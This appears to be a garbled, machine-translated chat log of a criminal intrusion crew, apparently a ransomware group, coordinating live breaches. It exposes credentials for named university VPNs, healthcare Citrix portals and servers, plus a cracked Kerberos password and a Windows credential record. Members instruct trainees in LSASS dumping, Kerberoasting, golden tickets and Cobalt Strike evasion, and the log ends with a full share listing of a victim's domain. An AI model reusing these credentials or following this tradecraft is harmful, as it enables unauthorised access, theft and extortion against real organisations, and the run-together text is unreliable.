fresh yescryptor there? activesimvp.com somebody one did not sign off on koba) the rest did not have a koba? likenic.com 104.243.40.126:38542 ``` not active me ``85.150.190.113:61718`` active (it's from the last one they gave)`` the others? ``` https://ezvol.com - 209.222.101.55:38350 Sessions from labs arrivetulkit will be closer to 15:00 fresh build, it will be given out @tl2, sootv from all of us feedback on the workrallss.com active/not activeskat me your old kobytes what about the tool kit and on kobami, in terms of work in the old or new will be?min 10 for org questions and then work directlyWell, hello again everyone, it's been a long time since we talked to you all 5) 5) 4 in total? 
all in place and start)Good day:space_invader:hello\Well, good daynix vpski ``` 192.169.6.100 u: root p: DG8mZZyB --- 192.52.167.104 u: root p: PeEDMf5q ``` ``Friends, I have no power at all, I'm leaving for segonday, if you get to raise any other network in addition to the one that raised to the correct rights - and will have strength - get to the domain controller and put in a slip for 180 a couple of three server sessions would be good aha)aha, it would be good)))) aha autopavnunu you give) drive machines in a bunch - where the rights fit - there will be removed lsaas and spit in the console, and I've already dreamed ... (or with each hand dump lsaasn each simply you do not need to create a session itself it only works for those machines where you have the admin Credits yes more here .... oh....... look at the screenshot it's probably pointless, because on the car yes he is not an admin or anything. this isn't serious. i am not a translator of the obvious articles all the same `[/][:]@> what should i specify here?)↪Psassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [/][:]@ what? what do you mean?)That is, run without specifying credentials with a target on the car where sits YES? they just go to the availableNo, of course only I have local admins and where Yes sit they are not admins. This will work? Yeah, let me try) @user4 to your problem, by the way, fits perfectly, it's someone who has a lot of cars with admin rights but no usernames needed http://securityonline.info/lsassy-extract-credentials-from-lsass-remotely/:thumbsup:will be to understand the new tool and method[ ] (https://mediaeveryone.com/channel/general?msg=32qzfSYtweTWNgzoD) ?everyone will have to read and get into it at least there will be a process update will we? can we finish with the current tasks and move smoothly to #sisd-petneav ptsh no way to run sharp files from memory? 
i build you under x64 dll+all build with x64 check?let's give you the silkod fileDelki stalenea no cobalt new? was the cleanest of the lastllvm I can buildCryptor is clean? there will be a meeting in half an hour and we'll discuss everything we'll start closing in an hour[ ](https://mediaeveryone.com/channel/general?msg=DQgoiuMG8xsQZaxZo) cheto silent dept(ok, I'll try it now? probably will take 3-4 kobu dept gather loads of clean for each personal kobu with a build?[ ](https://mediaeveryone.com/channel/general?msg=poH4tpKdX3YgrcJoR) took[ ](https://mediaeveryone.com/channel/general?msg=myX45efB6jTFRGsgG) `` https://studentappst.asu.edu/vpn/index.html egomez34 Pupilo10169!!! ``` @user7``` https://cloudgw.cpcc.edu/vpn/index.html sperez14 Lisbeth1219 ``` @user3 check, you had it in the works``` https://vlab.unf.edu/vpn/index.html n00647072 fLORIDAHISTORY2074! ``` Is @user8 still available to replace ?@tl1 is there anything else? Your credentials are invalid. Try again or contact your system administrator. https://citrix.signature-healthcare.org/citrix/xenapp/auth/login.aspx md.raws 1984Bears ``` @user3 replacement, so it's clean ```. Cannot find path 'C:\Users\Healdton.IT\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine' because it does not exist. ``Yes, fine-tuning the computer, if you get an error after running the above command, you can check the default path manually ``` dir $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine So you're out of a job? And once again, I gave you a report on each of the two you gave me. One in the confab and the other in general. In one of the data is jammed, the second can not run cmd ``. Get-PSReadLineOption ``` last time, write down the accesses are dead and the network is dead? https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx ``` I have this network open on you, did you write to #general or to the confab? okReinstalling the OS on your computer. You blacked out and didn't see the partitions in #general? 
So what have you been doing? I've been texting you on every single one. https://paloca.cernerworks.com/citrix/prodweb/ `````` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx `````` https://paloca.cernerworks.com/citrix/prodweb/ ``Yesterday with everyone on the networks, what's in work[ ](https://mediaeveryone.com/channel/general?msg=KkJ6tAjTNcYQip8Q5) What? [ ](https://mediaeveryone.com/channel/general?msg=7q8mQHmN7r28bkXnh) What do you mean yesterday missed? All died? What are you doing? I have 2 networks on you, I created you yesterday missed? Are you kidding, man? I wrote to you yesterday that the data is blockedpotomo created a hell of a conf[ ](https://mediaeveryone.com/channel/general?msg=ovxt4rPWrkyc7Tmzt) work you wrote back ok, you have progress on the grid or what? in trete look all there is a session domain `stg-healthcare.com` From where? @tl1 On what? @user3 not yet answered my question to me understand[ ](https://mediaeveryone.com/channel/general?msg=g8Qfkuof4BoNauGRY) ask about the loadNow if I think about it logically from your suggestion about the load how can I know about it? How do I know that @user3 is working with tpsh>I refer you to @user3 he works with tpsh>and you are in one place in this forum already met the information about this I do not know that someone else in tpsh could give me the load?[ ](https://mediaeveryone.com/channel/general?msg=hPxT9hsQA8o3dFvqP) i already answered in #general all sit there 2 people besides me had access therewas 5 people in one place[ ](https://mediaeveryone.com/channel/general?msg=5mapbAMAwqNMc4RMF) m? and got nothing i posted about it yesterday and i see that you chose to wait 4 hours ask your colleagues coba pulled or la/da got? i had a choice? 4 hours of what? just sat for 4 hours? i waited for it yesterday @user8 what have you been doing the last 4 hours? waiting for the load? we could not press 2 buttons and give the load to a colleague? me and @user8 ?how many people in the team? 
what more accurate? > i need a team to spawn in tcph.stg-healthcare.com[ ](https://mediaeveryone.com/channel/general?msg=aeofhWmcgAmQw4Ah2) that is the team in tpsh can?[ ](https://mediaeveryone.com/channel/general?msg=pGT2JSTaectAeK8Mm) more accurate? i had the same as i wrote in the chat roth trying to make portfwd does not want to workNormalized build alreadya command to tpsh can? how are you doing?:v:no thanksZe8ZW53FztpsVFTuser3a password can not rememberwhat - what? his, he moved the system, what login?@tl1 stalin in the rocket can not authorize, throw the password will be todaybuild? and the rocket was lying and could not go in any way rdp, because access in the rocket is lying for tpslichno i command wait for what? wait for what? i need a command to spawn in tpsh for the grid `tcph.stg-healthcare.com` what are you doing now?org - conf conf conf to plz @user3 vpn in work, you can to it+dav meaning to help? to support)[ ](https://mediaeveryone.com/channel/general?msg=M3Wiw2qsSajQRKZ29) it where? if today will update configs on vpn, i will give in work go to sapuga(went home aunty, apparently....+ disassembled? update injectorobnovnosti disassembleDa new koba? i1 people needdobavliv in chats in `CORPSFECRT04` if availablekrch, if vpn enabled immediately jump to `CORPKIOVDAPGM01` putilkydayut silkodelevisa flew[ ](https://mediaeveryone.com/channel/general?msg=8oQfYvwK867aCbLo3) lunch lingering I raced to the drugstore). after delivery so to speak, right behind the activated charcoal here came to work, had lunch and went home) lunch... everyone left sharply) yeah fuck) @user7 go smoke alone here)) then @user7 give the silk code[ ](https://mediaeveryone.com/channel/general?msg=qn5jrsA9jZxjAvG76) before the store probably give 1 kobe to replace the long? it came out@user9 you only kobe died yesterday? i already filthy kopech... i think only voodoo what kobe participated yesterday in the lok?give silkoda later will be? 
so far nothing to give out additional (all past (re-run all past? do through the old design now the whole list and I'll write back to youxactly some +@user7 also vpn@user3 will give vpn for work so, we have 2 people without a job?i will also put invey, but i have not decided where i will try to determine who the admin is, so i can determine whether they outsource or neta what is in sccy besides monitoring? in sccy user4, there is also monitoring i'm only in sccy what are the rest of them doing? @user9 in snu and sssutak about todaya don't remember there at all whining I'm gonna check the splotches? Yeah, I've checked them all. no vulnerabilities ms17, net_api, smbghost, rdp exploits, snu.edu what's left to check? i have one session from there, no dk, nothing is pinged there vpn snu.edusccy of the activeWhat? i have a vpn written out for you, but i do not see any information about itAnd i have a few questions for youdavay))) how to get a coffee minimum what current tasks? i do not understand you do not work?) i think on the roada where all?HiThen I do not understand what the problem is not countinglab / dedik? We do not have a winnda? It's a winnda and https://github.com/quasar/Quasarтак, then take it for a test))) Tool kit tested)) No. Nets what were / are? On what @tl1Hi what tasks? ptHiTo do not have a job? ┌─[input0 @parrot]─[~] └──╼ $ping helpdocpt.club PING helpdocpt.club (162.0.237.18) 56(84) bytes of data. 
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=1 ttl=52 time=206 ms 64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=2 ttl=52 time=207 ms 64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=3 ttl=52 time=208 ms 64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=4 ttl=52 time=414 ms 64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=5 ttl=52 time=207 ms:thumbsup:you will find YES we are going to move on there in the next couple of hours+while we are working with the matches+We will continue in half an hour+what time is it? an hour? rather yes than no)snacks)we were not told about lunches in these two days so, do you have lunch?you take hash krbtgt and make yourself a ticket for any MA and you're on a roll)H time passed, maybe even the next day, and all MA have changed passwords, dumps hashes from dx are taken from that including from MA2) it allows you to make a token from any user)) 1) if you get hash from krbtgt, I've never seen a case where you have a hash file from krbtgt somewhere on the disk (don't read it).txt` is also a good question if we got the hash of the krbtgt user we can do a golden ticket, what can we do with it? just like with ntlm hashes, you throw in a conf - you get the pass once you get the pass immediately passed to you emeralmatherials.com ``` here's the keb ``` $EPM.LOCAL$MSSQLSvc/SDCEPMVMQAPV02.EPM.LOCAL*$:Fujitsu2012 ``Because too serious pass and brute-force does not take) here are the domains in the archive lie, we took kerberos, but finished without it came out, it's all about non-identity, okay. Sitauatsiya, there is only kerberos hash, what to do with it? Where do I knock? A better question, a counter question, what is the point of getting kerberos hashes if we have never used them? Do you have no help for modules? 
Yes, knowledge about vectors and what you can and cannot give you useful modules, your task is to study them, document, check and use in practice, you should do this task in another, I can write everything about each module if you do not study the modules they give, what is the point?https://cisoclub.ru/kerberoasting/может you and tell us? more details, what kind of hashes, where from, whose, how they are there, why they are not the same everywhere, etc. gives some output to the console can also write "gives some output to the console") collects hashes from memory, as well as everything else, in principle, just for the record, how does invoke-kerberoast work?and another thing, the better you know how the network works together with Active Directory, the better understanding of what can be done in it we give you only the basics, to show that you can do this, but not always necessary, the better you think in the context of the task in the whole vector so the more you train to do the yuak bypass, look for their own modules for the tasks on the git, read guides, etc. as well as everything else in fact, this can only be cured by experience) inattention you sometimes 3-6 times in the hope that something will change you do not read the findings teams then can add more tools to our arsinal at lunch time? let's sit and do some research at lunchtime[ ](https://mediaeveryone.com/channel/general?msg=HY3ZumpXaCbLmxJPw) from what I've seen[ ](https://mediaeveryone.com/channel/general?msg=QTfEBz7jkqkEardwe) even to give an example, in some zelda you can't pass a riddle, you look at the youtube walkthrough and you're already advanced just here with the analysis, listen to reasoning, some chips from the "stuffed hand" tackle and then we'll take apart the new materialafter lunch more questions for a couple of hoursmaybe while you go to lunch did not negotiate you lunch an hour off? 
or you go?[ ](https://mediaeveryone.com/channel/general?msg=WKA2Jom9LuADmvBea) the same rebuilding modules based on the starting environment, just will be faster because the hand is stuffed)2-5) first search for the same command on the same git in c# .net application, then third-party modules that can be imported and as a last resort - download the module to your own dedicata, take the source file and moved by hand into the folder of modules on the target machine - perform the necessary actions - clean up after themselves it is clear, just incredibly interesting to look at the passage of at least one network directly in the field with reasoning, and not like everyone on the Internet in their lab without a hitch2-3) build your own exe version and run the same questions?because you didn't go further than PE, but today we will[ ](https://mediaeveryone.com/channel/general?msg=5sWj3jXdCZqfa2LGg) already on the lp there may be differences at the stage of UAC for example, at the stage of domain disconnection in the EA context so no experience at all.By the way, yes, it would indeed be extremely interesting to see how someone more professional than us works.Not identical sessions, identical actions * understandably not identical, but the algorithm in different contexts is approximately the same low priv - collect what's available LA/System - mimic and other more serious things DA - we haven't used anything but dcsync Just for the contexts, actions are essentially identical, maybe we are not working as it should, and maybe it is so it's understandable that situations are different and allWe are not just expanding the arsenal, methods, structuringsomewhere you drop AV for 5 minutes of any activity, etc.somewhere nothing of the modules will not work at allwhere you can unroot kerberoast in 10 minutes You understand that the sessions are far from identical Yes, from the appearance of the session to the DC where are 2 users still?the question at the level of "what if Stalin was 
alive now", for example, raising privileges for the average life of one session from 1 minute to 4 hours?well once from the side to see what to do after the first session?) the order of what?) well the order of what actions? will there be a "master class" with a description of actions ?[ ](https://mediaeveryone.com/channel/general?msg=guBDpNRBxZXHDQioL) do not know what to describe here - what is required in the user context or tied to it (browsers, winscp, putty etc.) do from the user context, what requires system rights (hashdump, logonpassword) from the system[ ](https://mediaeveryone.com/channel/general?msg=u8SJcuXGnrkeCtBXb) please answer the question you may have when you have tried everything [ ](https://mediaeveryone.com/channel/general?msg=2JB9BEAgsYLjYY8Ae) I never used it but it should be in your arsenal anyway because it could be the last vulnerability to raise your rights) you have a mindmap and you can go to any point you want [ ](https://mediaeveryone.com/channel/general?msg=XTmBDzwfkSKsKXJHh) it depends on the problem. if your session crashes - you see what AV, if you need to get on the target machine - idletime, the maximum useful information is passwords and hashes, because you will at least have a dictionary for the brute force, at most you will have a dictionary for the brute force attack, and at most you will have a system to try to reach other hashes/passwords. The point is you can't hashdump without a rights system, right?passwords, hashes, that's why I asked the question, what to look for in winpis a lot of information about elevating privileges via dllhijack - how often is this technique used in real life? does it make sense to mess around with it? Target : MicrosoftOffice16_Data:orgid:simon.bolley@gpj.com UserName : Password : Canada!75 CredentialType : Generic PersistenceType : LocalComputer LastWriteTime : 1/21/2020 9:16:27 AM ``Skip open your seatbelt on gpj of course)``I never found passwords in winPEAS and seatbelt. 
These questions are answered by the modules above-the question is where they are and how to get them-the maximum usefulness - passwordswhat did I get out of them for chat, what was useful and what was worth getting out, what was not worth getting out-I mean besides there list of balls, AV and other stuff, what will be useful to get out?it's all by category and there's a link to the site with a description ``` https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation `````` https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS ``[ ](https://mediaeveryone.com/channel/general?msg=QgGf843gNp4ZJSSBb) as an option idletime to check when was the last user activity before you enter by rp2-1) got an error - google it, in time you will learn popular errors (cobaltstrike error 5 - If you get an error 5 (access denied) after you try to link to a Beacon) 2-2) on passwords and "interesting" files that may contain passwords. you can also look for internal portals that may be vulnerable (ala sql injection), which will allow you to open a session already on the server 2-3) don't understand the question. 2-4) let's leave the question for now. 2-5) don't understand the question. 2-6) koba itself adds this information when you scan through portscan hosts and koba sees the OS, it will automatically add it to the Targets, the command adds a Hashdump hashes, etc., Type in addition to the default AdFInd and other collectors, what you can in low priv yute? can shed on which tools are best used in what contexts pro 2-2 support, maybe in `group ` instead of `all ` makes sense to specify something else in some cases? The same about winPEAS, the conclusion is gigantic, but what is the most useful to pull out? 
first questions on the already existing knowledge and experience, then how to understand `disassemble the network`?VladislavHolding said in the video that we were not taught how to parse the network, which tools are better to use and in what cases (at least a couple for a more detailed study of them) about 1, I can assume the way you work, that you do not return the original context after creating tokens. And the modules require requests to the `psinject` - `This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process` 1) This is taken from PowerView via psinject :^), but the point is that it popped up with both Invoke-Kerberoast and SMBAutoBruteThis release integrates Lee's work with Beacon. The `powerpick [cmdlet+args]` command will spawn a process, inject the Unmanaged PowerShell magic into it, and run the requested command. I've also added `psinject [pid] [arch] [command]` to Beacon as well. This command will inject the Unmanaged PowerShell DLL into a specific process and run the command you request. This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process1) what module? 2) All possibilities are on the git info page, where you can find the help) 3) psinject is running psh code in a different process, this prevents you from killing the session if psh code execution is detected in the system 4) don't know, never used this argument) 5) `execute-assembly /SharpChrome.exe logins /showall` 1. This error: ``` ERROR: Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect. ERROR: " ERROR: At line:13117 char:24 ERROR: + else { $Results = $GPOSearcher.FindAll() } ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException ERROR: + FullyQualifiedErrorId : DirectoryServicesCOMException ERROR: ``` What's the problem with this one? How do I get around it? What does it mean? 2. 
"rubeus is a more serious tool ;-)" What other features does it have besides asreproast and kerberoast? 3. What is the main difference between powerpick and psinject, if you say that the latter is better than the former, but the former worked yesterday in powerView, unlike the latter? 4. What is the meaning of ` /privileges:enable` argument at `wmic` if specifying LA/DA credentials? 5. How to work with SharpChrome, not SharpWeb, but Chrome. He does not have the most understandable help, how many attempts have not been - in vain so what? 20 minutes to prepare a list the first hour we will deal with general questions about the software, vectors, etc.hi:space_invader:Good morningGood morning, waiting for that, this week we will get and sessions and a new tool.sha on sessions ?all good day )+add everyone to expFederal.com I can't do anything with this lab. https://cloudgw.cpcc.edu/vpn/index.html ``` and what's up with that?)Sure you're with them? I don't see a confab I'll create expFederal.com = hobbes? Do you need a confab for that? 
```
\\USCHI-HD001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-HD001.Hobbes.loc\C$ - Default share
\\USCHI-HD001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-HD001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-APG003.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-APG003.Hobbes.loc\C$ - Default share
\\USCHI-APG003.Hobbes.loc\E$ - Default share
\\USCHI-APG003.Hobbes.loc\F$ - Default share
\\USCHI-APG003.Hobbes.loc\IPC$ - Remote IPC
\\PCHIVH001.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIVH001.Hobbes.loc\C$ - Default share
\\PCHIVH001.Hobbes.loc\E$ - Default share
\\PCHIVH001.Hobbes.loc\IPC$ - Remote IPC
\\PCHIVH001.Hobbes.loc\V$ - Default share
\\PCHIAPG015.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIAPG015.Hobbes.loc\C$ - Default share
\\PCHIAPG015.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MAXP001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MAXP001.Hobbes.loc\C$ - Default share
\\USCHI-MAXP001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MAXP001.Hobbes.loc\M$ - Default share
\\USCHI-MAXP001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-LT002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-LT002.Hobbes.loc\C$ - Default share
\\USCHI-LT002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NET005.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-NET005.Hobbes.loc\C$ - Default share
\\USCHI-NET005.Hobbes.loc\E$ - Default share
\\USCHI-NET005.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NET005.Hobbes.loc\print$ - Printer Drivers
\\PCHIFSP001.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIFSP001.Hobbes.loc\Apps
\\PCHIFSP001.Hobbes.loc\ARCH -
\\PCHIFSP001.Hobbes.loc\C$ - Default share
\\PCHIFSP001.Hobbes.loc\Cad -
\\PCHIFSP001.Hobbes.loc\Citrix - Citrix Profiles
\\PCHIFSP001.Hobbes.loc\CIVIL -
\\PCHIFSP001.Hobbes.loc\COMM -
\\PCHIFSP001.Hobbes.loc\COMP -
\\PCHIFSP001.Hobbes.loc\CONST -
\\PCHIFSP001.Hobbes.loc\D$ - Default share
\\PCHIFSP001.Hobbes.loc\ELEC -
\\PCHIFSP001.Hobbes.loc\EXEC -
\\PCHIFSP001.Hobbes.loc\F$ - Default share
\\PCHIFSP001.Hobbes.loc\FS-0043 -
\\PCHIFSP001.Hobbes.loc\FS-0044 -
\\PCHIFSP001.Hobbes.loc\HR -
\\PCHIFSP001.Hobbes.loc\IPC$ - Remote IPC
\\PCHIFSP001.Hobbes.loc\IROA - IROA - ActiveInk Docs
\\PCHIFSP001.Hobbes.loc\MARKET -
\\PCHIFSP001.Hobbes.loc\MECH -
\\PCHIFSP001.Hobbes.loc\MKTG - Business Operations
\\PowerVault NAS Utilities - PowerVault NAS Utilities
\\PCHIFSP001.Hobbes.loc\Network -
\\PCHIFSP001.Hobbes.loc\Pccommon -
\\PCHIFSP001.Hobbes.loc\proj_ae -
\\PCHIFSP001.Hobbes.loc\proj_cvl -
\\PCHIFSP001.Hobbes.loc\proj_str -
\\PCHIFSP001.Hobbes.loc\PTW6512 -
\\PCHIFSP001.Hobbes.loc\Restricted$ -
\\PCHIFSP001.Hobbes.loc\Safety -
\\PCHIFSP001.Hobbes.loc\SCANS -
\\PCHIFSP001.Hobbes.loc\SECTLDR -
\\PCHIFSP001.Hobbes.loc\Software$ - expFederal Software
\\PCHIFSP001.Hobbes.loc\Standard -
\\PCHIFSP001.Hobbes.loc\STRUCT -
\\PCHIFSP001.Hobbes.loc\Sys - Project Folders
\\PCHIFSP001.Hobbes.loc\TENGCNST -
\\PCHIFSP001.Hobbes.loc\User$ - Users Folders
\\USCHI-NET001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-NET001.Hobbes.loc\C$ - Default share
\\USCHI-NET001.Hobbes.loc\E$ - Default share
\\USCHI-NET001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NET001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-NET001.Hobbes.loc\Software$ -
\\USCHI-NET001.Hobbes.loc\USCHI-PLT-0008 - Oce ColorWare Plotter 300
\\USCHI-MSE001.Hobbes.loc\address -
\\USCHI-MSE001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MSE001.Hobbes.loc\C$ - Default share
\\USCHI-MSE001.Hobbes.loc\E$ - Default share
\\USCHI-MSE001.Hobbes.loc\F$ - Default share
\\USCHI-MSE001.Hobbes.loc\G$ - Default share
\\USCHI-MSE001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MSE004.Hobbes.loc\address -
\\USCHI-MSE004.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MSE004.Hobbes.loc\C$ - Default share
\\USCHI-MSE004.Hobbes.loc\E$ - Default share
\\USCHI-MSE004.Hobbes.loc\F$ - Default share
\\USCHI-MSE004.Hobbes.loc\G$ - Default share
\\USCHI-MSE004.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-APG004.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-APG004.Hobbes.loc\Analytics_c8466842-1a17-4bad-abad-7d935647974b -
\\USCHI-APG004.Hobbes.loc\C$ - Default share
\\USCHI-APG004.Hobbes.loc\E$ - Default share
\\USCHI-APG004.Hobbes.loc\F$ - Default share
\\USCHI-APG004.Hobbes.loc\gthrsvc_c8466842-1a17-4bad-abad-7d935647974b-crawl-0 - Crawled Files Sharec8466842-1a17-4bad-abad-7d935647974b-crawl-0
\\USCHI-APG004.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-APG004.Hobbes.loc\print$ - Printer Drivers
\\USCHI-DCG002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-DCG002.Hobbes.loc\C$ - Default share
\\USCHI-DCG002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG002.Hobbes.loc\print$ - Printer Drivers
\\PCHIWSG005.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIWSG005.Hobbes.loc\AM -
\\PCHIWSG005.Hobbes.loc\AMM3EXT$ - BC-Meridian Extensions Share
\\PCHIWSG005.Hobbes.loc\C$ - Default share
\\PCHIWSG005.Hobbes.loc\F$ - Default share
\\PCHIWSG005.Hobbes.loc\IPC$ - Remote IPC
\\PCHIAPG016.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIAPG016.Hobbes.loc\C$ - Default share
\\PCHIAPG016.Hobbes.loc\IPC$ - Remote IPC
\\PCHIAPG016.Hobbes.loc\SophosUpdate -
\\PCHIAPG016.Hobbes.loc\SUMInstallSet - Sophos Update Manager Installer
\\USCHI-PWD001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-PWD001.Hobbes.loc\C$ - Default share
\\USCHI-PWD001.Hobbes.loc\E$ - Default share
\\USCHI-PWD001.Hobbes.loc\F$ - Default share
\\USCHI-PWD001.Hobbes.loc\G$ - Default share
\\USCHI-PWD001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCP001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-DCP001.Hobbes.loc\C$ - Default share
\\USCHI-DCP001.Hobbes.loc\DAG01.hobbes.loc - File share witness created for microsoft exchange database availability group DAG01.
\\USCHI-DCP001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCP001.Hobbes.loc\NETLOGON - Logon server share
\\USCHI-DCP001.Hobbes.loc\SYSVOL - Logon server share
\\PCHIAPG014.Hobbes.loc\ActiveAdministrator - Active Administrator Server Share
\\PCHIAPG014.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIAPG014.Hobbes.loc\BEW-4ecbc619f6de49a39b3bda9cec5b9074 - Push Directory
\\PCHIAPG014.Hobbes.loc\C$ - Default share
\\PCHIAPG014.Hobbes.loc\DADevicePolicyMaster$ - DADevicePolicyMaster$ share
\\PCHIAPG014.Hobbes.loc\E$ - Default share
\\PCHIAPG014.Hobbes.loc\IPC$ - Remote IPC
\\PCHIAPG014.Hobbes.loc\Logs$ - Logs$ share
\\PCHIAPG014.Hobbes.loc\SLDAClient$ - SLDAClient$ share
\\PCHIAPG014.Hobbes.loc\Slogic$ - \\PCHIAPG014\SLOGIC$ share
\\PCHIAPG014.Hobbes.loc\SLscripts$ - SLscripts$ share
\\PCHIWSG007.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIWSG007.Hobbes.loc\C$ - Default share
\\PCHIWSG007.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG003.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-DCG003.Hobbes.loc\C$ - Default share
\\USCHI-DCG003.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG003.Hobbes.loc\NETLOGON - Logon server share
\\USCHI-DCG003.Hobbes.loc\SYSVOL - Logon server share
\\USCHI-BKP001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-BKP001.Hobbes.loc\C$ - Default share
\\USCHI-BKP001.Hobbes.loc\D$ - Default share
\\USCHI-BKP001.Hobbes.loc\E$ - Default share
\\USCHI-BKP001.Hobbes.loc\F$ - Default share
\\USCHI-BKP001.Hobbes.loc\G$ - Default share
\\USCHI-BKP001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-BKP001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-PRT001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-PRT001.Hobbes.loc\C$ - Default share
\\USCHI-PRT001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-PRT001.Hobbes.loc\print$ - Printer Drivers
\\Print$ - Plotters NAME should not contain "_" per vendor recommendation
\\USCHI-PRT001.Hobbes.loc\USCHI-PL_OCECW300_PS - USCHI-PL_OCECW300_PS
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045 - South - Canon iR-ADV C5045/5051 PCL6
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045_PS - South - Canon iR-ADV C50455051 PS3
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255 - North - Canon iR-ADV C5250/5255 PCL6
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255_PS - North - Canon iR-ADV C52505255 PS3
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530 - South - HP Color LaserJet CM3530
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530_PS - South - HP Color LaserJet CM3530 PS
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525 - HR Area - HP Color LaserJet CP3525 PCL6
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525_PS - HR Area - HP Color LaserJet CP3525 PS
\\USCHI-MAXD001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MAXD001.Hobbes.loc\C$ - Default share
\\USCHI-MAXD001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MAXD001.Hobbes.loc\M$ - Default share
\\USCHI-MSE003.Hobbes.loc\address -
\\USCHI-MSE003.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MSE003.Hobbes.loc\C$ - Default share
\\USCHI-MSE003.Hobbes.loc\E$ - Default share
\\USCHI-MSE003.Hobbes.loc\F$ - Default share
\\USCHI-MSE003.Hobbes.loc\G$ - Default share
\\USCHI-MSE003.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SQL001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SQL001.Hobbes.loc\C$ - Default share
\\USCHI-SQL001.Hobbes.loc\E$ - Default share
\\USCHI-SQL001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SQL001.Hobbes.loc\print$ - Printer Drivers
\\Remote Admin $\DT-000037.Hobbes.loc\ADMIN$ - Remote Admin
\\DT-000037.Hobbes.loc\C$ - Default share
\\DT-000037.Hobbes.loc\IPC$ - Remote IPC
\\PCHIWSG006.Hobbes.loc\70182862-e52d-4fb0-bea2-3448c35de88f-query-0 - Used by Microsoft Search Server 2010 to copy index files between servers.
\\PCHIWSG006.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIWSG006.Hobbes.loc\C$ - Default share
\\PCHIWSG006.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MSE002.Hobbes.loc\address -
\\USCHI-MSE002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MSE002.Hobbes.loc\C$ - Default share
\\USCHI-MSE002.Hobbes.loc\E$ - Default share
\\USCHI-MSE002.Hobbes.loc\F$ - Default share
\\USCHI-MSE002.Hobbes.loc\G$ - Default share
\\USCHI-MSE002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-DCG001.Hobbes.loc\C$ - Default share
\\USCHI-DCG001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG001.Hobbes.loc\NETLOGON - Logon server share
\\USCHI-DCG001.Hobbes.loc\SYSVOL - Logon server share
